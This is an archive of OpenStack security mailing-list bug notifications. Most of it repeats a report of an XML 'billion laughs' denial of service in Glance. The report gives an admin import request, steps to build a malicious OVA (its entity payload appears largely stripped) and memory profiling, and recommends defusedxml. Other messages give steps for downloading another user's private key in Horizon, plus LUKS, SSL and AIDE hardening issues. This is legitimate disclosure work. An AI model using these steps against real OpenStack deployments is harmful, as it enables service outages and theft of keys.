----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB 
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From tmcpeak at us.ibm.com Wed Sep 28 23:20:01 2016 From: tmcpeak at us.ibm.com (Travis McPeak) Date: Wed, 28 Sep 2016 23:20:01 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160928232001.21379.48551.malone@soybean.canonical.com> I don't think it matters how the feature is described in the spec. If it's on by default it's not experimental. Restricted to admin definitely lowers impact though. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. 
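The mitigation section of the report recommends replacing xml.etree with defusedxml. A minimal sketch of that swap at the parsing call site follows; it is not the actual ovf_process.py patch. It uses defusedxml.ElementTree.parse(), which raises EntitiesForbidden as soon as a document declares entities (defusedxml's iterparse support has historically been limited, so the streaming call used in ovf_process.py may need slightly different treatment):

    # Sketch only, not the Glance patch. Assumes defusedxml is installed and
    # that rejecting any OVF descriptor that declares XML entities is
    # acceptable for the OVA import flow.
    from defusedxml import ElementTree as SafeET
    from defusedxml import EntitiesForbidden

    def read_ovf(path):
        try:
            # defusedxml refuses entity declarations instead of expanding
            # them, so a "billion laughs" document fails fast.
            return SafeET.parse(path)
        except EntitiesForbidden:
            raise ValueError('OVF descriptor %s declares XML entities; '
                             'refusing to import it' % path)
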
----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB 
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From sean_mcginnis at dell.com Thu Sep 29 02:40:04 2016 From: sean_mcginnis at dell.com (Sean McGinnis) Date: Thu, 29 Sep 2016 02:40:04 -0000 Subject: [Openstack-security] [Bug 1381365] Re: SSL Version and cipher selection not possible References: <20141015072233.17942.25827.malonedeb@chaenomeles.canonical.com> Message-ID: <20160929024009.23919.53317.launchpad@gac.canonical.com> ** Changed in: cinder Status: New => Won't Fix -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1381365 Title: SSL Version and cipher selection not possible Status in Cinder: Won't Fix Status in Glance: New Status in OpenStack Identity (keystone): Won't Fix Status in OpenStack Compute (nova): Won't Fix Status in OpenStack Security Advisory: Won't Fix Bug description: We configure keystone to use SSL always. Due to the poodle issue, I was trying to configure keystone to disable SSLv3 completely. http://googleonlinesecurity.blogspot.fi/2014/10/this-poodle-bites-exploiting-ssl-30.html https://www.openssl.org/~bodo/ssl-poodle.pdf It seems that keystone has no support for configring SSL versions, nor ciphers. If I'm not mistaken the relevant code is in the start function in common/environment/eventlet_server.py It calls eventlet.wrap_ssl but with no SSL version nor cipher options. Since the interface is identical, I assume it uses ssl.wrap_socket. The default here seems to be PROTOCOL_SSLv23 (SSL2 disabled), which would make this vulnerable to the poodle issue. SSL conifgs should probably be possible to be set in the config file (with sane defaults), so that current and newly detected weak ciphers can be disabled without code changes. 
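A minimal sketch of the kind of change being asked for: passing an explicit protocol and cipher list down to the socket wrapping. It assumes eventlet.wrap_ssl() forwards its keyword arguments to the standard library's ssl.wrap_socket(); the certificate paths, port, protocol constant and cipher string are illustrative placeholders rather than proposed Keystone configuration defaults:

    # Sketch only: force a TLS-only protocol and an explicit cipher list
    # when wrapping the listening socket with eventlet. Paths and values
    # are placeholders; assumes ssl_version/ciphers are passed through to
    # ssl.wrap_socket().
    import ssl
    import eventlet

    listener = eventlet.listen(('0.0.0.0', 35357))
    tls_listener = eventlet.wrap_ssl(
        listener,
        certfile='/etc/keystone/ssl/certs/keystone.pem',      # placeholder
        keyfile='/etc/keystone/ssl/private/keystonekey.pem',  # placeholder
        server_side=True,
        ssl_version=ssl.PROTOCOL_TLSv1,       # refuse SSLv2/SSLv3 handshakes
        ciphers='HIGH:!aNULL:!eNULL:!SSLv2',  # drop weak ciphers
    )

Exposing ssl_version and ciphers as configuration options, with defaults along these lines, would let operators react to the next weak-cipher disclosure without a code change, which is what the report asks for.
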
To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1381365/+subscriptions From sean_mcginnis at dell.com Thu Sep 29 02:36:10 2016 From: sean_mcginnis at dell.com (Sean McGinnis) Date: Thu, 29 Sep 2016 02:36:10 -0000 Subject: [Openstack-security] [Bug 1372375] Re: Attaching LVM encrypted volumes (with LUKS) could cause data loss if LUKS headers get corrupted References: <20140922095132.18315.85937.malonedeb@chaenomeles.canonical.com> Message-ID: <20160929023615.18035.28447.launchpad@wampee.canonical.com> ** Changed in: cinder Status: New => Won't Fix -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1372375 Title: Attaching LVM encrypted volumes (with LUKS) could cause data loss if LUKS headers get corrupted Status in Cinder: Won't Fix Status in OpenStack Compute (nova): Invalid Status in OpenStack Security Advisory: Won't Fix Bug description: I have doubts about the flow of the volume attach operation, as defined in /usr/lib/python2.6/site-packages/nova/volume/encryptors/luks.py. If the device is not recognized as a valid LUKS device, the script LUKS-formats it! So if for some reason the LUKS header gets corrupted, it erases all of the data. To manage corrupted headers there are the cryptsetup luksHeaderBackup and cryptsetup luksHeaderRestore commands, which respectively back up and restore the headers. I think that the process has to be reviewed, and the luksFormat operation has to be performed during volume creation. To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1372375/+subscriptions From sbauza at free.fr Thu Sep 29 09:30:56 2016 From: sbauza at free.fr (Sylvain Bauza) Date: Thu, 29 Sep 2016 09:30:56 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160929093056.23640.79647.malone@soybean.canonical.com> Given the above comments, it doesn't seem related to Nova at all. Putting it as Invalid unless I'm wrong; if so, feel free to put it back to New. ** Changed in: nova Status: New => Incomplete ** Changed in: nova Status: Incomplete => Invalid -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Compute (nova): Invalid Status in OpenStack Security Advisory: Won't Fix Bug description: The bug was reproduced in the Mitaka OpenStack release. Steps to reproduce: 1. Log in to Horizon. 2. Click Project -> Compute -> Access and Security 3. Click the "Key Pairs" tab 4. Click the "Create Key Pair" button and enter a keypair name. 5. On the next screen with the download key dialog, copy the URL from the browser URL field. The URL will look like http://server/horizon/project/access_and_security/keypairs/<keypair_name>/download 6. Click cancel to close the download window. 7. Click Project -> Compute -> Instances. 8. In the opened window, select another key pair name from the KEY PAIR column (it could be a key pair for a different user). 9. Open a new browser window and paste the URL string from step 5. 10. Change <keypair_name> in the URL to the name obtained from step 8 and press enter. You will be prompted to download the private key for the other user.
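A minimal sketch of how the behaviour in these steps could be checked outside a browser follows. It assumes a valid Horizon session cookie is available; the host name, cookie value and keypair name are placeholders. A deployment that enforces ownership should refuse this request rather than return key material:

    # Sketch only: probe the Horizon keypair download URL from the report.
    # The host, the "sessionid" cookie value and the keypair name are
    # placeholders.
    import requests

    url = ('http://server/horizon/project/access_and_security/'
           'keypairs/other_users_keypair/download')
    resp = requests.get(url,
                        cookies={'sessionid': 'VALID_HORIZON_SESSION'},
                        allow_redirects=False)
    print(resp.status_code, resp.headers.get('Content-Type'))
    # If ownership is enforced, this should not come back as a key download.
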
It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From ian.cordasco at rackspace.com Thu Sep 29 14:05:03 2016 From: ian.cordasco at rackspace.com (Ian Cordasco) Date: Thu, 29 Sep 2016 14:05:03 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160929140503.23833.42905.malone@gac.canonical.com> So I'm confused. If something requires configuration before it will work, is that on by default? work_dir defaults to none. That means it will not allow tasks to run by default. Is that default in a way that I'm not understanding? -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. 
(Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. 
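The profiling above is taken from the host with vboxmanage; an alternative that works inside the guest is to watch the resident memory of the glance-api workers directly while the task runs. A small sketch, assuming a reasonably recent psutil is installed and that matching on the process command line is an acceptable heuristic:

    # Sketch: print the combined resident memory of glance-api processes
    # every few seconds. Assumes psutil; the command-line match is a
    # heuristic.
    import time
    import psutil

    def glance_rss():
        total = 0
        for p in psutil.process_iter():
            try:
                if 'glance-api' in ' '.join(p.cmdline()):
                    total += p.memory_info().rss
            except (psutil.NoSuchProcess, psutil.AccessDenied):
                continue
        return total

    while True:
        print('glance-api RSS: %.1f MiB' % (glance_rss() / (1024.0 * 1024)))
        time.sleep(5)
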
Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From 1619039 at bugs.launchpad.net Thu Sep 29 17:44:27 2016 From: 1619039 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 29 Sep 2016 17:44:27 -0000 Subject: [Openstack-security] [Bug 1619039] Fix included in openstack/openstack-ansible-security 13.3.4 References: <20160831203607.4213.54281.malonedeb@wampee.canonical.com> Message-ID: <20160929174427.27899.23190.malone@chaenomeles.canonical.com> This issue was fixed in the openstack/openstack-ansible-security 13.3.4 release. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1619039 Title: Logging of martian packets should be configurable Status in openstack-ansible: Fix Released Bug description: The martian logging should be tunable. When neutron uses Linux bridging for networking, lots of martian packets will be logged. This logging isn't useful and can fill up a syslog server quickly. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1619039/+subscriptions From 1617343 at bugs.launchpad.net Thu Sep 29 17:44:29 2016 From: 1617343 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 29 Sep 2016 17:44:29 -0000 Subject: [Openstack-security] [Bug 1617343] Fix included in openstack/openstack-ansible-security 13.3.4 References: <20160826141422.16089.54915.malonedeb@soybean.canonical.com> Message-ID: <20160929174429.23585.7639.malone@gac.canonical.com> This issue was fixed in the openstack/openstack-ansible-security 13.3.4 release. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1617343 Title: AIDE should not look at changes in /run Status in openstack-ansible: Fix Released Bug description: AIDE shouldn't be wandering into /run since things there only live temporarily. --------------------------------------------------- Changed entries: --------------------------------------------------- d =.... mc.. .. .: /etc/apparmor.d/libvirt d =.... mc.. .. .: /etc/libvirt/qemu d =.... mc.. .. .: /root f >b... mc..C.. .: /root/.bash_history f >.... mc..C.. .: /root/.ssh/known_hosts f >b... mci.C.. .: /root/.viminfo f =.... mci.C.. : /run/motd.dynamic d >.... mc.. .. : /run/shm f =.... ....C.. : /run/shm/spice.29052 d =.... mc.. .. : /run/systemd/sessions d =.... 
mc.. .. : /run/systemd/users f =.... mci.C.. : /run/systemd/users/0 d >.... . .. : /run/udev/data d =.... mc.. .. : /run/user To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1617343/+subscriptions From 1616281 at bugs.launchpad.net Thu Sep 29 17:44:31 2016 From: 1616281 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 29 Sep 2016 17:44:31 -0000 Subject: [Openstack-security] [Bug 1616281] Fix included in openstack/openstack-ansible-security 13.3.4 References: <20160824023003.4754.11744.malonedeb@gac.canonical.com> Message-ID: <20160929174431.24103.32246.malone@soybean.canonical.com> This issue was fixed in the openstack/openstack-ansible-security 13.3.4 release. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1616281 Title: Can't initialize AIDE during subsequent playbook runs Status in openstack-ansible: Fix Released Bug description: AIDE isn't initialized by default because it can cause a lot of system load when it does its first check of a new system. If a deployer applies the security hardening role with ``initialize_aide`` set to False (the default), it won't be initialized. However, if they set it to True and re-run the playbook, AIDE is already configured and the handler to initialize AIDE won't execute. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1616281/+subscriptions From 1619039 at bugs.launchpad.net Thu Sep 29 18:07:55 2016 From: 1619039 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 29 Sep 2016 18:07:55 -0000 Subject: [Openstack-security] [Bug 1619039] Fix included in openstack/openstack-ansible-security 12.2.4 References: <20160831203607.4213.54281.malonedeb@wampee.canonical.com> Message-ID: <20160929180755.17718.12000.malone@wampee.canonical.com> This issue was fixed in the openstack/openstack-ansible-security 12.2.4 release. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1619039 Title: Logging of martian packets should be configurable Status in openstack-ansible: Fix Released Bug description: The martian logging should be tunable. When neutron uses Linux bridging for networking, lots of martian packets will be logged. This logging isn't useful and can fill up a syslog server quickly. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1619039/+subscriptions From 1617343 at bugs.launchpad.net Thu Sep 29 18:07:56 2016 From: 1617343 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 29 Sep 2016 18:07:56 -0000 Subject: [Openstack-security] [Bug 1617343] Fix included in openstack/openstack-ansible-security 12.2.4 References: <20160826141422.16089.54915.malonedeb@soybean.canonical.com> Message-ID: <20160929180757.17359.72656.malone@wampee.canonical.com> This issue was fixed in the openstack/openstack-ansible-security 12.2.4 release. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1617343 Title: AIDE should not look at changes in /run Status in openstack-ansible: Fix Released Bug description: AIDE shouldn't be wandering into /run since things there only live temporarily. --------------------------------------------------- Changed entries: --------------------------------------------------- d =.... mc.. .. 
.: /etc/apparmor.d/libvirt d =.... mc.. .. .: /etc/libvirt/qemu d =.... mc.. .. .: /root f >b... mc..C.. .: /root/.bash_history f >.... mc..C.. .: /root/.ssh/known_hosts f >b... mci.C.. .: /root/.viminfo f =.... mci.C.. : /run/motd.dynamic d >.... mc.. .. : /run/shm f =.... ....C.. : /run/shm/spice.29052 d =.... mc.. .. : /run/systemd/sessions d =.... mc.. .. : /run/systemd/users f =.... mci.C.. : /run/systemd/users/0 d >.... . .. : /run/udev/data d =.... mc.. .. : /run/user To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1617343/+subscriptions From 1616281 at bugs.launchpad.net Thu Sep 29 18:07:58 2016 From: 1616281 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 29 Sep 2016 18:07:58 -0000 Subject: [Openstack-security] [Bug 1616281] Fix included in openstack/openstack-ansible-security 12.2.4 References: <20160824023003.4754.11744.malonedeb@gac.canonical.com> Message-ID: <20160929180758.23995.57067.malone@gac.canonical.com> This issue was fixed in the openstack/openstack-ansible-security 12.2.4 release. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1616281 Title: Can't initialize AIDE during subsequent playbook runs Status in openstack-ansible: Fix Released Bug description: AIDE isn't initialized by default because it can cause a lot of system load when it does its first check of a new system. If a deployer applies the security hardening role with ``initialize_aide`` set to False (the default), it won't be initialized. However, if they set it to True and re-run the playbook, AIDE is already configured and the handler to initialize AIDE won't execute. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1616281/+subscriptions From ian.cordasco at rackspace.com Thu Sep 29 18:53:30 2016 From: ian.cordasco at rackspace.com (Ian Cordasco) Date: Thu, 29 Sep 2016 18:53:30 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160929185330.27339.27508.malone@chaenomeles.canonical.com> > but this feature(import OVA file task) is on by default. How is this on by default if you need to set the option in the config for it to work? Do you mean the API is something that you can send requests to? What I keep hearing is "We can't exploit this without the default config but we consider this a higher priority because it's exploitable by default" and that's not making sense. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion 